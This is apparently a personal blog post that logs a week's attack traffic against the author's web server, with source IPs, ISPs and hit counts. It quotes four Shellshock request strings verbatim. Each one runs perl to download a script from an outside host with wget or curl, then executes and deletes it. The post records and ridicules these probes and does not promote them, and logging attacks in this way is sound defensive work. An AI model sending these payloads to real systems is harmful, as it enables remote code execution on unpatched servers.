freistilreisen.de

pussyriotAnother week (my blog) and another netblock.  Either freistilreisen.de is run as a probe site or the people behind are pretty incompetent.

Anyhow America wins this week the award of testing something.

who count what
95.163.86.123 /ru 13 GET /cgi-bin/bash contact.cgi  etc
“() { :;};/usr/bin/perl -e ‘print \”Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\”;system(\”wget
http://www.freistilreisen.de/jack.jpg -O /tmp/jack.jpg;curl -O /tmp/jack.jpg http://www.freistilreisen.de/jack.jpg;perl
/tmp/jack.jpg;rm -rf /tmp/jack.jpg*\”);'”
74.219.225.232 /
us Road Runner Commercial abuse@rr.com
58 GET /phppath/php “() { :;};/usr/bin/perl -e ‘print \”Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\”;system(\”wget http://www.freistilreisen.de/jack.jpg -O /tmp/jack.jpg;curl -O /tmp/jack.jpg http://www.freistilreisen.de/jack.jpg;perl /tmp/jack.jpg;rm -rf /tmp/jack.jpg*\”);'”
213.136.83.35 /de Contabo GmbH 14 “GET HTTP/1.1 HTTP/1.1” “() { :;};/usr/bin/perl -e ‘print \”Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\”;system(\”wget http://istats.netne.net/z.pl -O /tmp/z.pl;curl -O /tmp/z.pl http://istats.netne.net/z.pl;perl /tmp/z.pl;rm -rf /tmp/z.pl*\”);'”
60.251.202.121 / tw HINET-NET 13 “GET /cgi-bin/php5 HTTP/1.1” “() { :;};/usr/bin/perl -e ‘print \”Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\”;system(\”wget http://istats.netne.net/z.pl -O /tmp/z.pl;curl -O /tmp/z.pl http://istats.netne.net/z.pl;perl /tmp/z.pl;rm -rf /tmp/z.pl*\”);'”
count 23

Getting bored with doing these now.

by golly but...

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s